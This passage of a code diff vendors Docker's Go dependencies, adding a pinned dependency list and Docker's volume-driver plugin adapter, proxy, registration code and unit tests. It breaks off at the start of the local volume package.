+github.com/Azure/go-ansiterm 388960b655244e76e24c75f48631564eaefade62
+github.com/Microsoft/hcsshim v0.5.9
+github.com/Microsoft/go-winio v0.3.8
+github.com/Sirupsen/logrus v0.11.0
+github.com/davecgh/go-spew 6d212800a42e8ab5c146b8ace3490ee17e5225f9
+github.com/docker/libtrust 9cbd2a1374f46905c68a4eb3694a130610adc62a
+github.com/go-check/check 4ed411733c5785b40214c70bce814c3a3a689609 https://github.com/cpuguy83/check.git
+github.com/gorilla/context v1.1
+github.com/gorilla/mux v1.1
+github.com/kr/pty 5cf931ef8f
+github.com/mattn/go-shellwords v1.0.0
+github.com/mattn/go-sqlite3 v1.1.0
+github.com/tchap/go-patricia v2.2.6
+github.com/vdemeester/shakers 24d7f1d6a71aa5d9cbe7390e4afb66b7eef9e1b3
+# forked golang.org/x/net package includes a patch for lazy loading trace templates
+golang.org/x/net 2beffdc2e92c8a3027590f898fe88f69af48a3f8 https://github.com/tonistiigi/net.git
+golang.org/x/sys 8f0908ab3b2457e2e15403d3697c9ef5cb4b57a9
+github.com/docker/go-units 8a7beacffa3009a9ac66bad506b18ffdd110cf97
+github.com/docker/go-connections ecb4cb2dd420ada7df7f2593d6c25441f65f69f2
+
+github.com/RackSec/srslog 456df3a81436d29ba874f3590eeeee25d666f8a5
+github.com/imdario/mergo 0.2.1
+
+#get libnetwork packages
+github.com/docker/libnetwork 45b40861e677e37cf27bc184eca5af92f8cdd32d
+github.com/docker/go-events 18b43f1bc85d9cdd42c05a6cd2d444c7a200a894
+github.com/armon/go-radix e39d623f12e8e41c7b5529e9a9dd67a1e2261f80
+github.com/armon/go-metrics eb0af217e5e9747e41dd5303755356b62d28e3ec
+github.com/hashicorp/go-msgpack 71c2886f5a673a35f909803f38ece5810165097b
+github.com/hashicorp/memberlist 88ac4de0d1a0ca6def284b571342db3b777a4c37
+github.com/hashicorp/go-multierror fcdddc395df1ddf4247c69bd436e84cfa0733f7e
+github.com/hashicorp/serf 598c54895cc5a7b1a24a398d635e8c0ea0959870
+github.com/docker/libkv 1d8431073ae03cdaedb198a89722f3aab6d418ef
+github.com/vishvananda/netns 604eaf189ee867d8c147fafc28def2394e878d25
+github.com/vishvananda/netlink 482f7a52b758233521878cb6c5904b6bd63f3457
+github.com/BurntSushi/toml f706d00e3de6abe700c994cdd545a1a4915af060
+github.com/samuel/go-zookeeper d0e0d8e11f318e000a8cc434616d69e329edc374
+github.com/deckarep/golang-set ef32fa3046d9f249d399f98ebaf9be944430fd1d
+github.com/coreos/etcd 3a49cbb769ebd8d1dd25abb1e83386e9883a5707
+github.com/ugorji/go f1f1a805ed361a0e078bb537e4ea78cd37dcf065
+github.com/hashicorp/consul v0.5.2
+github.com/boltdb/bolt fff57c100f4dea1905678da7e90d92429dff2904
+github.com/miekg/dns 75e6e86cc601825c5dbcd4e0c209eab180997cd7
+
+# get graph and distribution packages
+github.com/docker/distribution 28602af35aceda2f8d571bad7ca37a54cf0250bc
+github.com/vbatts/tar-split v0.10.1
+
+# get go-zfs packages
+github.com/mistifyio/go-zfs 22c9b32c84eb0d0c6f4043b6e90fc94073de92fa
+github.com/pborman/uuid v1.0
+
+# get desired notary commit, might also need to be updated in Dockerfile
+github.com/docker/notary v0.4.2
+
+google.golang.org/grpc v1.0.2
+github.com/miekg/pkcs11 df8ae6ca730422dba20c768ff38ef7d79077a59f
+github.com/docker/go v1.5.1-1-1-gbaf439e
+github.com/agl/ed25519 d2b94fd789ea21d12fac1a4443dd3a3f79cda72c
+
+# When updating, also update RUNC_COMMIT in hack/dockerfile/binaries-commits accordingly
+github.com/opencontainers/runc 9df8b306d01f59d3a8029be411de015b7304dd8f https://github.com/docker/runc.git # libcontainer
+github.com/opencontainers/runtime-spec 1c7c27d043c2a5e513a44084d2b10d77d1402b8c # specs
+github.com/seccomp/libseccomp-golang 32f571b70023028bd57d9288c20efbcb237f3ce0
+# libcontainer deps (see src/github.com/opencontainers/runc/Godeps/Godeps.json)
+github.com/coreos/go-systemd v4
+github.com/godbus/dbus v4.0.0
+github.com/syndtr/gocapability 2c00daeb6c3b45114c80ac44119e7b8801fdd852
+github.com/golang/protobuf 1f49d83d9aa00e6ce4fc8258c71cc7786aec968a
+
+# gelf logging driver deps
+github.com/Graylog2/go-gelf aab2f594e4585d43468ac57287b0dece9d806883
+
+github.com/fluent/fluent-logger-golang v1.2.1
+# fluent-logger-golang deps
+github.com/philhofer/fwd 899e4efba8eaa1fea74175308f3fae18ff3319fa
+github.com/tinylib/msgp 75ee40d2601edf122ef667e2a07d600d4c44490c
+
+# fsnotify
+github.com/fsnotify/fsnotify v1.2.11
+
+# awslogs deps
+github.com/aws/aws-sdk-go v1.4.22
+github.com/go-ini/ini 060d7da055ba6ec5ea7a31f116332fe5efa04ce0
+github.com/jmespath/go-jmespath 0b12d6b521d83fc7f755e7cfc1b1fbdd35a01a74
+
+# logentries
+github.com/bsphere/le_go d3308aafe090956bc89a65f0769f58251a1b4f03
+
+# gcplogs deps
+golang.org/x/oauth2 2baa8a1b9338cf13d9eeb27696d761155fa480be
+google.golang.org/api dc6d2353af16e2a2b0ff6986af051d473a4ed468
+google.golang.org/cloud dae7e3d993bc3812a2185af60552bb6b847e52a0
+
+# native credentials
+github.com/docker/docker-credential-helpers f72c04f1d8e71959a6d103f808c50ccbad79b9fd
+
+# containerd
+github.com/docker/containerd aa8187dbd3b7ad67d8e5e3a15115d3eef43a7ed1
+github.com/tonistiigi/fifo 1405643975692217d6720f8b54aeee1bf2cd5cf4
+
+# cluster
+github.com/docker/swarmkit 1c7f003d75f091d5f7051ed982594420e4515f77
+github.com/golang/mock bd3c8e81be01eef76d4b503f5e687d2d1354d2d9
+github.com/gogo/protobuf v0.3
+github.com/cloudflare/cfssl 7fb22c8cba7ecaf98e4082d22d65800cf45e042a
+github.com/google/certificate-transparency d90e65c3a07988180c5b1ece71791c0b6506826e
+golang.org/x/crypto 3fbbcd23f1cb824e69491a5930cfeff09b12f4d2
+golang.org/x/time a4bde12657593d5e90d0533a3e4fd95e635124cb
+github.com/mreiferson/go-httpclient 63fe23f7434723dc904c901043af07931f293c47
+github.com/hashicorp/go-memdb 608dda3b1410a73eaf3ac8b517c9ae7ebab6aa87
+github.com/hashicorp/go-immutable-radix 8e8ed81f8f0bf1bdd829593fdd5c29922c1ea990
+github.com/hashicorp/golang-lru a0d98a5f288019575c6d1f4bb1573fef2d1fcdc4
+github.com/coreos/pkg fa29b1d70f0beaddd4c7021607cc3c3be8ce94b8
+github.com/pivotal-golang/clock 3fd3c1944c59d9742e1cd333672181cd1a6f9fa0
+github.com/prometheus/client_golang 52437c81da6b127a9925d17eb3a382a2e5fd395e
+github.com/beorn7/perks 4c0e84591b9aa9e6dcfdf3e020114cd81f89d5f9
+github.com/prometheus/client_model fa8ad6fec33561be4280a8f0514318c79d7f6cb6
+github.com/prometheus/common ebdfc6da46522d58825777cf1f90490a5b1ef1d8
+github.com/prometheus/procfs abf152e5f3e97f2fafac028d2cc06c1feb87ffa5
+bitbucket.org/ww/goautoneg 75cd24fc2f2c2a2088577d12123ddee5f54e0675
+github.com/matttproud/golang_protobuf_extensions fc2b8d3a73c4867e51861bbdd5ae3c1f0869dd6a
+github.com/pkg/errors 839d9e913e063e28dfd0e6c7b7512793e0a48be9
+
+# cli
+github.com/spf13/cobra v1.5 https://github.com/dnephin/cobra.git
+github.com/spf13/pflag dabebe21bf790f782ea4c7bbd2efc430de182afd
+github.com/inconshreveable/mousetrap 76626ae9c91c4f2a10f34cad8ce83ea42c93bb75
+github.com/flynn-archive/go-shlex 3f9db97f856818214da2e1057f8ad84803971cff
+
+# metrics
+github.com/docker/go-metrics 86138d05f285fd9737a99bee2d9be30866b59d72
+
+# composefile
+github.com/mitchellh/mapstructure f3009df150dadf309fdee4a54ed65c124afad715
+github.com/xeipuuv/gojsonpointer e0fe6f68307607d540ed8eac07a342c33fa1b54a
+github.com/xeipuuv/gojsonreference e02fc20de94c78484cd5ffb007f8af96be030a45
+github.com/xeipuuv/gojsonschema 93e72a773fade158921402d6a24c819b48aba29d
+gopkg.in/yaml.v2 a83829b6f1293c91addabc89d0571c246397bbf4
diff --git a/vendor/github.com/docker/docker/volume/drivers/adapter.go b/vendor/github.com/docker/docker/volume/drivers/adapter.go
new file mode 100644
index 0000000000..62ef7dfe60
--- /dev/null
+++ b/vendor/github.com/docker/docker/volume/drivers/adapter.go
@@ -0,0 +1,177 @@
+package volumedrivers
+
+import (
+	"errors"
+	"path/filepath"
+	"strings"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/volume"
+)
+
+var (
+	errNoSuchVolume = errors.New("no such volume")
+)
+
+type volumeDriverAdapter struct {
+	name         string
+	baseHostPath string
+	capabilities *volume.Capability
+	proxy        *volumeDriverProxy
+}
+
+func (a *volumeDriverAdapter) Name() string {
+	return a.name
+}
+
+func (a *volumeDriverAdapter) Create(name string, opts map[string]string) (volume.Volume, error) {
+	if err := a.proxy.Create(name, opts); err != nil {
+		return nil, err
+	}
+	return &volumeAdapter{
+		proxy:        a.proxy,
+		name:         name,
+		driverName:   a.name,
+		baseHostPath: a.baseHostPath,
+	}, nil
+}
+
+func (a *volumeDriverAdapter) Remove(v volume.Volume) error {
+	return a.proxy.Remove(v.Name())
+}
+
+func hostPath(baseHostPath, path string) string {
+	if baseHostPath != "" {
+		path = filepath.Join(baseHostPath, path)
+	}
+	return path
+}
+
+func (a *volumeDriverAdapter) List() ([]volume.Volume, error) {
+	ls, err := a.proxy.List()
+	if err != nil {
+		return nil, err
+	}
+
+	var out []volume.Volume
+	for _, vp := range ls {
+		out = append(out, &volumeAdapter{
+			proxy:        a.proxy,
+			name:         vp.Name,
+			baseHostPath: a.baseHostPath,
+			driverName:   a.name,
+			eMount:       hostPath(a.baseHostPath, vp.Mountpoint),
+		})
+	}
+	return out, nil
+}
+
+func (a *volumeDriverAdapter) Get(name string) (volume.Volume, error) {
+	v, err := a.proxy.Get(name)
+	if err != nil {
+		return nil, err
+	}
+
+	// plugin may have returned no volume and no error
+	if v == nil {
+		return nil, errNoSuchVolume
+	}
+
+	return &volumeAdapter{
+		proxy:        a.proxy,
+		name:         v.Name,
+		driverName:   a.Name(),
+		eMount:       v.Mountpoint,
+		status:       v.Status,
+		baseHostPath: a.baseHostPath,
+	}, nil
+}
+
+func (a *volumeDriverAdapter) Scope() string {
+	cap := a.getCapabilities()
+	return cap.Scope
+}
+
+func (a *volumeDriverAdapter) getCapabilities() volume.Capability {
+	if a.capabilities != nil {
+		return *a.capabilities
+	}
+	cap, err := a.proxy.Capabilities()
+	if err != nil {
+		// `GetCapabilities` is a not a required endpoint.
+		// On error assume it's a local-only driver
+		logrus.Warnf("Volume driver %s returned an error while trying to query its capabilities, using default capabilties: %v", a.name, err)
+		return volume.Capability{Scope: volume.LocalScope}
+	}
+
+	// don't spam the warn log below just because the plugin didn't provide a scope
+	if len(cap.Scope) == 0 {
+		cap.Scope = volume.LocalScope
+	}
+
+	cap.Scope = strings.ToLower(cap.Scope)
+	if cap.Scope != volume.LocalScope && cap.Scope != volume.GlobalScope {
+		logrus.Warnf("Volume driver %q returned an invalid scope: %q", a.Name(), cap.Scope)
+		cap.Scope = volume.LocalScope
+	}
+
+	a.capabilities = &cap
+	return cap
+}
+
+type volumeAdapter struct {
+	proxy        *volumeDriverProxy
+	name         string
+	baseHostPath string
+	driverName   string
+	eMount       string // ephemeral host volume path
+	status       map[string]interface{}
+}
+
+type proxyVolume struct {
+	Name       string
+	Mountpoint string
+	Status     map[string]interface{}
+}
+
+func (a *volumeAdapter) Name() string {
+	return a.name
+}
+
+func (a *volumeAdapter) DriverName() string {
+	return a.driverName
+}
+
+func (a *volumeAdapter) Path() string {
+	if len(a.eMount) == 0 {
+		mountpoint, _ := a.proxy.Path(a.name)
+		a.eMount = hostPath(a.baseHostPath, mountpoint)
+	}
+	return a.eMount
+}
+
+func (a *volumeAdapter) CachedPath() string {
+	return a.eMount
+}
+
+func (a *volumeAdapter) Mount(id string) (string, error) {
+	mountpoint, err := a.proxy.Mount(a.name, id)
+	a.eMount = hostPath(a.baseHostPath, mountpoint)
+	return a.eMount, err
+}
+
+func (a *volumeAdapter) Unmount(id string) error {
+	err := a.proxy.Unmount(a.name, id)
+	if err == nil {
+		a.eMount = ""
+	}
+	return err
+}
+
+func (a *volumeAdapter) Status() map[string]interface{} {
+	out := make(map[string]interface{}, len(a.status))
+	for k, v := range a.status {
+		out[k] = v
+	}
+	return out
+}
diff --git a/vendor/github.com/docker/docker/volume/drivers/extpoint.go b/vendor/github.com/docker/docker/volume/drivers/extpoint.go
new file mode 100644
index 0000000000..576dee8a1b
--- /dev/null
+++ b/vendor/github.com/docker/docker/volume/drivers/extpoint.go
@@ -0,0 +1,215 @@
+//go:generate pluginrpc-gen -i $GOFILE -o proxy.go -type volumeDriver -name VolumeDriver
+
+package volumedrivers
+
+import (
+	"fmt"
+	"sync"
+
+	"github.com/docker/docker/pkg/locker"
+	getter "github.com/docker/docker/pkg/plugingetter"
+	"github.com/docker/docker/volume"
+)
+
+// currently created by hand. generation tool would generate this like:
+// $ extpoint-gen Driver > volume/extpoint.go
+
+var drivers = &driverExtpoint{
+	extensions: make(map[string]volume.Driver),
+	driverLock: &locker.Locker{},
+}
+
+const extName = "VolumeDriver"
+
+// NewVolumeDriver returns a driver has the given name mapped on the given client.
+func NewVolumeDriver(name string, baseHostPath string, c client) volume.Driver {
+	proxy := &volumeDriverProxy{c}
+	return &volumeDriverAdapter{name: name, baseHostPath: baseHostPath, proxy: proxy}
+}
+
+// volumeDriver defines the available functions that volume plugins must implement.
+// This interface is only defined to generate the proxy objects.
+// It's not intended to be public or reused.
+type volumeDriver interface {
+	// Create a volume with the given name
+	Create(name string, opts map[string]string) (err error)
+	// Remove the volume with the given name
+	Remove(name string) (err error)
+	// Get the mountpoint of the given volume
+	Path(name string) (mountpoint string, err error)
+	// Mount the given volume and return the mountpoint
+	Mount(name, id string) (mountpoint string, err error)
+	// Unmount the given volume
+	Unmount(name, id string) (err error)
+	// List lists all the volumes known to the driver
+	List() (volumes []*proxyVolume, err error)
+	// Get retrieves the volume with the requested name
+	Get(name string) (volume *proxyVolume, err error)
+	// Capabilities gets the list of capabilities of the driver
+	Capabilities() (capabilities volume.Capability, err error)
+}
+
+type driverExtpoint struct {
+	extensions map[string]volume.Driver
+	sync.Mutex
+	driverLock   *locker.Locker
+	plugingetter getter.PluginGetter
+}
+
+// RegisterPluginGetter sets the plugingetter
+func RegisterPluginGetter(plugingetter getter.PluginGetter) {
+	drivers.plugingetter = plugingetter
+}
+
+// Register associates the given driver to the given name, checking if
+// the name is already associated
+func Register(extension volume.Driver, name string) bool {
+	if name == "" {
+		return false
+	}
+
+	drivers.Lock()
+	defer drivers.Unlock()
+
+	_, exists := drivers.extensions[name]
+	if exists {
+		return false
+	}
+
+	if err := validateDriver(extension); err != nil {
+		return false
+	}
+
+	drivers.extensions[name] = extension
+
+	return true
+}
+
+// Unregister dissociates the name from its driver, if the association exists.
+func Unregister(name string) bool {
+	drivers.Lock()
+	defer drivers.Unlock()
+
+	_, exists := drivers.extensions[name]
+	if !exists {
+		return false
+	}
+	delete(drivers.extensions, name)
+	return true
+}
+
+// lookup returns the driver associated with the given name. If a
+// driver with the given name has not been registered it checks if
+// there is a VolumeDriver plugin available with the given name.
+func lookup(name string, mode int) (volume.Driver, error) {
+	drivers.driverLock.Lock(name)
+	defer drivers.driverLock.Unlock(name)
+
+	drivers.Lock()
+	ext, ok := drivers.extensions[name]
+	drivers.Unlock()
+	if ok {
+		return ext, nil
+	}
+	if drivers.plugingetter != nil {
+		p, err := drivers.plugingetter.Get(name, extName, mode)
+		if err != nil {
+			return nil, fmt.Errorf("Error looking up volume plugin %s: %v", name, err)
+		}
+
+		d := NewVolumeDriver(p.Name(), p.BasePath(), p.Client())
+		if err := validateDriver(d); err != nil {
+			return nil, err
+		}
+
+		if p.IsV1() {
+			drivers.Lock()
+			drivers.extensions[name] = d
+			drivers.Unlock()
+		}
+		return d, nil
+	}
+	return nil, fmt.Errorf("Error looking up volume plugin %s", name)
+}
+
+func validateDriver(vd volume.Driver) error {
+	scope := vd.Scope()
+	if scope != volume.LocalScope && scope != volume.GlobalScope {
+		return fmt.Errorf("Driver %q provided an invalid capability scope: %s", vd.Name(), scope)
+	}
+	return nil
+}
+
+// GetDriver returns a volume driver by its name.
+// If the driver is empty, it looks for the local driver.
+func GetDriver(name string) (volume.Driver, error) {
+	if name == "" {
+		name = volume.DefaultDriverName
+	}
+	return lookup(name, getter.LOOKUP)
+}
+
+// CreateDriver returns a volume driver by its name and increments RefCount.
+// If the driver is empty, it looks for the local driver.
+func CreateDriver(name string) (volume.Driver, error) {
+	if name == "" {
+		name = volume.DefaultDriverName
+	}
+	return lookup(name, getter.ACQUIRE)
+}
+
+// RemoveDriver returns a volume driver by its name and decrements RefCount..
+// If the driver is empty, it looks for the local driver.
+func RemoveDriver(name string) (volume.Driver, error) {
+	if name == "" {
+		name = volume.DefaultDriverName
+	}
+	return lookup(name, getter.RELEASE)
+}
+
+// GetDriverList returns list of volume drivers registered.
+// If no driver is registered, empty string list will be returned.
+func GetDriverList() []string {
+	var driverList []string
+	drivers.Lock()
+	for driverName := range drivers.extensions {
+		driverList = append(driverList, driverName)
+	}
+	drivers.Unlock()
+	return driverList
+}
+
+// GetAllDrivers lists all the registered drivers
+func GetAllDrivers() ([]volume.Driver, error) {
+	var plugins []getter.CompatPlugin
+	if drivers.plugingetter != nil {
+		var err error
+		plugins, err = drivers.plugingetter.GetAllByCap(extName)
+		if err != nil {
+			return nil, fmt.Errorf("error listing plugins: %v", err)
+		}
+	}
+	var ds []volume.Driver
+
+	drivers.Lock()
+	defer drivers.Unlock()
+
+	for _, d := range drivers.extensions {
+		ds = append(ds, d)
+	}
+
+	for _, p := range plugins {
+		name := p.Name()
+		ext, ok := drivers.extensions[name]
+		if ok {
+			continue
+		}
+
+		ext = NewVolumeDriver(name, p.BasePath(), p.Client())
+		if p.IsV1() {
+			drivers.extensions[name] = ext
+		}
+		ds = append(ds, ext)
+	}
+	return ds, nil
+}
diff --git a/vendor/github.com/docker/docker/volume/drivers/extpoint_test.go b/vendor/github.com/docker/docker/volume/drivers/extpoint_test.go
new file mode 100644
index 0000000000..428b0752f2
--- /dev/null
+++ b/vendor/github.com/docker/docker/volume/drivers/extpoint_test.go
@@ -0,0 +1,23 @@
+package volumedrivers
+
+import (
+	"testing"
+
+	volumetestutils "github.com/docker/docker/volume/testutils"
+)
+
+func TestGetDriver(t *testing.T) {
+	_, err := GetDriver("missing")
+	if err == nil {
+		t.Fatal("Expected error, was nil")
+	}
+	Register(volumetestutils.NewFakeDriver("fake"), "fake")
+
+	d, err := GetDriver("fake")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if d.Name() != "fake" {
+		t.Fatalf("Expected fake driver, got %s\n", d.Name())
+	}
+}
diff --git a/vendor/github.com/docker/docker/volume/drivers/proxy.go b/vendor/github.com/docker/docker/volume/drivers/proxy.go
new file mode 100644
index 0000000000..b23db6258f
--- /dev/null
+++ b/vendor/github.com/docker/docker/volume/drivers/proxy.go
@@ -0,0 +1,242 @@
+// generated code - DO NOT EDIT
+
+package volumedrivers
+
+import (
+	"errors"
+
+	"github.com/docker/docker/volume"
+)
+
+type client interface {
+	Call(string, interface{}, interface{}) error
+}
+
+type volumeDriverProxy struct {
+	client
+}
+
+type volumeDriverProxyCreateRequest struct {
+	Name string
+	Opts map[string]string
+}
+
+type volumeDriverProxyCreateResponse struct {
+	Err string
+}
+
+func (pp *volumeDriverProxy) Create(name string, opts map[string]string) (err error) {
+	var (
+		req volumeDriverProxyCreateRequest
+		ret volumeDriverProxyCreateResponse
+	)
+
+	req.Name = name
+	req.Opts = opts
+	if err = pp.Call("VolumeDriver.Create", req, &ret); err != nil {
+		return
+	}
+
+	if ret.Err != "" {
+		err = errors.New(ret.Err)
+	}
+
+	return
+}
+
+type volumeDriverProxyRemoveRequest struct {
+	Name string
+}
+
+type volumeDriverProxyRemoveResponse struct {
+	Err string
+}
+
+func (pp *volumeDriverProxy) Remove(name string) (err error) {
+	var (
+		req volumeDriverProxyRemoveRequest
+		ret volumeDriverProxyRemoveResponse
+	)
+
+	req.Name = name
+	if err = pp.Call("VolumeDriver.Remove", req, &ret); err != nil {
+		return
+	}
+
+	if ret.Err != "" {
+		err = errors.New(ret.Err)
+	}
+
+	return
+}
+
+type volumeDriverProxyPathRequest struct {
+	Name string
+}
+
+type volumeDriverProxyPathResponse struct {
+	Mountpoint string
+	Err        string
+}
+
+func (pp *volumeDriverProxy) Path(name string) (mountpoint string, err error) {
+	var (
+		req volumeDriverProxyPathRequest
+		ret volumeDriverProxyPathResponse
+	)
+
+	req.Name = name
+	if err = pp.Call("VolumeDriver.Path", req, &ret); err != nil {
+		return
+	}
+
+	mountpoint = ret.Mountpoint
+
+	if ret.Err != "" {
+		err = errors.New(ret.Err)
+	}
+
+	return
+}
+
+type volumeDriverProxyMountRequest struct {
+	Name string
+	ID   string
+}
+
+type volumeDriverProxyMountResponse struct {
+	Mountpoint string
+	Err        string
+}
+
+func (pp *volumeDriverProxy) Mount(name string, id string) (mountpoint string, err error) {
+	var (
+		req volumeDriverProxyMountRequest
+		ret volumeDriverProxyMountResponse
+	)
+
+	req.Name = name
+	req.ID = id
+	if err = pp.Call("VolumeDriver.Mount", req, &ret); err != nil {
+		return
+	}
+
+	mountpoint = ret.Mountpoint
+
+	if ret.Err != "" {
+		err = errors.New(ret.Err)
+	}
+
+	return
+}
+
+type volumeDriverProxyUnmountRequest struct {
+	Name string
+	ID   string
+}
+
+type volumeDriverProxyUnmountResponse struct {
+	Err string
+}
+
+func (pp *volumeDriverProxy) Unmount(name string, id string) (err error) {
+	var (
+		req volumeDriverProxyUnmountRequest
+		ret volumeDriverProxyUnmountResponse
+	)
+
+	req.Name = name
+	req.ID = id
+	if err = pp.Call("VolumeDriver.Unmount", req, &ret); err != nil {
+		return
+	}
+
+	if ret.Err != "" {
+		err = errors.New(ret.Err)
+	}
+
+	return
+}
+
+type volumeDriverProxyListRequest struct {
+}
+
+type volumeDriverProxyListResponse struct {
+	Volumes []*proxyVolume
+	Err     string
+}
+
+func (pp *volumeDriverProxy) List() (volumes []*proxyVolume, err error) {
+	var (
+		req volumeDriverProxyListRequest
+		ret volumeDriverProxyListResponse
+	)
+
+	if err = pp.Call("VolumeDriver.List", req, &ret); err != nil {
+		return
+	}
+
+	volumes = ret.Volumes
+
+	if ret.Err != "" {
+		err = errors.New(ret.Err)
+	}
+
+	return
+}
+
+type volumeDriverProxyGetRequest struct {
+	Name string
+}
+
+type volumeDriverProxyGetResponse struct {
+	Volume *proxyVolume
+	Err    string
+}
+
+func (pp *volumeDriverProxy) Get(name string) (volume *proxyVolume, err error) {
+	var (
+		req volumeDriverProxyGetRequest
+		ret volumeDriverProxyGetResponse
+	)
+
+	req.Name = name
+	if err = pp.Call("VolumeDriver.Get", req, &ret); err != nil {
+		return
+	}
+
+	volume = ret.Volume
+
+	if ret.Err != "" {
+		err = errors.New(ret.Err)
+	}
+
+	return
+}
+
+type volumeDriverProxyCapabilitiesRequest struct {
+}
+
+type volumeDriverProxyCapabilitiesResponse struct {
+	Capabilities volume.Capability
+	Err          string
+}
+
+func (pp *volumeDriverProxy) Capabilities() (capabilities volume.Capability, err error) {
+	var (
+		req volumeDriverProxyCapabilitiesRequest
+		ret volumeDriverProxyCapabilitiesResponse
+	)
+
+	if err = pp.Call("VolumeDriver.Capabilities", req, &ret); err != nil {
+		return
+	}
+
+	capabilities = ret.Capabilities
+
+	if ret.Err != "" {
+		err = errors.New(ret.Err)
+	}
+
+	return
+}
diff --git a/vendor/github.com/docker/docker/volume/drivers/proxy_test.go b/vendor/github.com/docker/docker/volume/drivers/proxy_test.go
new file mode 100644
index 0000000000..b78c46a036
--- /dev/null
+++ b/vendor/github.com/docker/docker/volume/drivers/proxy_test.go
@@ -0,0 +1,132 @@
+package volumedrivers
+
+import (
+	"fmt"
+	"net/http"
+	"net/http/httptest"
+	"net/url"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/pkg/plugins"
+	"github.com/docker/go-connections/tlsconfig"
+)
+
+func TestVolumeRequestError(t *testing.T) {
+	mux := http.NewServeMux()
+	server := httptest.NewServer(mux)
+	defer server.Close()
+
+	mux.HandleFunc("/VolumeDriver.Create", func(w http.ResponseWriter, r *http.Request) {
+		w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json")
+		fmt.Fprintln(w, `{"Err": "Cannot create volume"}`)
+	})
+
+	mux.HandleFunc("/VolumeDriver.Remove", func(w http.ResponseWriter, r *http.Request) {
+		w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json")
+		fmt.Fprintln(w, `{"Err": "Cannot remove volume"}`)
+	})
+
+	mux.HandleFunc("/VolumeDriver.Mount", func(w http.ResponseWriter, r *http.Request) {
+		w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json")
+		fmt.Fprintln(w, `{"Err": "Cannot mount volume"}`)
+	})
+
+	mux.HandleFunc("/VolumeDriver.Unmount", func(w http.ResponseWriter, r *http.Request) {
+		w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json")
+		fmt.Fprintln(w, `{"Err": "Cannot unmount volume"}`)
+	})
+
+	mux.HandleFunc("/VolumeDriver.Path", func(w http.ResponseWriter, r *http.Request) {
+		w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json")
+		fmt.Fprintln(w, `{"Err": "Unknown volume"}`)
+	})
+
+	mux.HandleFunc("/VolumeDriver.List", func(w http.ResponseWriter, r *http.Request) {
+		w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json")
+		fmt.Fprintln(w, `{"Err": "Cannot list volumes"}`)
+	})
+
+	mux.HandleFunc("/VolumeDriver.Get", func(w http.ResponseWriter, r *http.Request) {
+		w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json")
+		fmt.Fprintln(w, `{"Err": "Cannot get volume"}`)
+	})
+
+	mux.HandleFunc("/VolumeDriver.Capabilities", func(w http.ResponseWriter, r *http.Request) {
+		w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json")
+		http.Error(w, "error", 500)
+	})
+
+	u, _ := url.Parse(server.URL)
+	client, err := plugins.NewClient("tcp://"+u.Host, &tlsconfig.Options{InsecureSkipVerify: true})
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	driver := volumeDriverProxy{client}
+
+	if err = driver.Create("volume", nil); err == nil {
+		t.Fatal("Expected error, was nil")
+	}
+
+	if !strings.Contains(err.Error(), "Cannot create volume") {
+		t.Fatalf("Unexpected error: %v\n", err)
+	}
+
+	_, err = driver.Mount("volume", "123")
+	if err == nil {
+		t.Fatal("Expected error, was nil")
+	}
+
+	if !strings.Contains(err.Error(), "Cannot mount volume") {
+		t.Fatalf("Unexpected error: %v\n", err)
+	}
+
+	err = driver.Unmount("volume", "123")
+	if err == nil {
+		t.Fatal("Expected error, was nil")
+	}
+
+	if !strings.Contains(err.Error(), "Cannot unmount volume") {
+		t.Fatalf("Unexpected error: %v\n", err)
+	}
+
+	err = driver.Remove("volume")
+	if err == nil {
+		t.Fatal("Expected error, was nil")
+	}
+
+	if !strings.Contains(err.Error(), "Cannot remove volume") {
+		t.Fatalf("Unexpected error: %v\n", err)
+	}
+
+	_, err = driver.Path("volume")
+	if err == nil {
+		t.Fatal("Expected error, was nil")
+	}
+
+	if !strings.Contains(err.Error(), "Unknown volume") {
+		t.Fatalf("Unexpected error: %v\n", err)
+	}
+
+	_, err = driver.List()
+	if err == nil {
+		t.Fatal("Expected error, was nil")
+	}
+	if !strings.Contains(err.Error(), "Cannot list volumes") {
+		t.Fatalf("Unexpected error: %v\n", err)
+	}
+
+	_, err = driver.Get("volume")
+	if err == nil {
+		t.Fatal("Expected error, was nil")
+	}
+	if !strings.Contains(err.Error(), "Cannot get volume") {
+		t.Fatalf("Unexpected error: %v\n", err)
+	}
+
+	_, err = driver.Capabilities()
+	if err == nil {
+		t.Fatal(err)
+	}
+}
diff --git a/vendor/github.com/docker/docker/volume/local/local.go b/vendor/github.com/docker/docker/volume/local/local.go
new file mode 100644
index 0000000000..62c45e69ea
--- /dev/null
+++ b/vendor/github.com/docker/docker/volume/local/local.go
@@ -0,0 +1,364 @@
+// Package local provides the default implementation for volumes. It
+// is used to mount data volume containers and directories local to
+// the host server.
+package local
+
+import (
+	"encoding/json"
+	"fmt"
+	"io/ioutil"
+	"os"
+	"path/filepath"
+	"reflect"
+	"strings"
+	"sync"
+
+	"github.com/pkg/errors"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/pkg/idtools"
+	"github.com/docker/docker/pkg/mount"
+	"github.com/docker/docker/utils"
+	"github.com/docker/docker/volume"
+)
+
+// VolumeDataPathName is the name of the directory where the volume data is stored.
+// It uses a very distinctive name to avoid collisions migrating data between
+// Docker versions.
+const (
+	VolumeDataPathName = "_data"
+	volumesPathName    = "volumes"
+)
+
+var (
+	// ErrNotFound is the typed error returned when the requested volume name can't be found
+	ErrNotFound = fmt.Errorf("volume not found")
+	// volumeNameRegex ensures the name assigned for the volume is valid.
+	// This name is used to create the bind directory, so we need to avoid characters that
+	// would make the path to escape the root directory.
+	volumeNameRegex = utils.RestrictedNamePattern
+)
+
+type validationError struct {
+	error
+}
+
+func (validationError) IsValidationError() bool {
+	return true
+}
+
+type activeMount struct {
+	count   uint64
+	mounted bool
+}
+
+// New instantiates a new Root instance with the provided scope. Scope
+// is the base path that the Root instance uses to store its
+// volumes. The base path is created here if it does not exist.
+func New(scope string, rootUID, rootGID int) (*Root, error) {
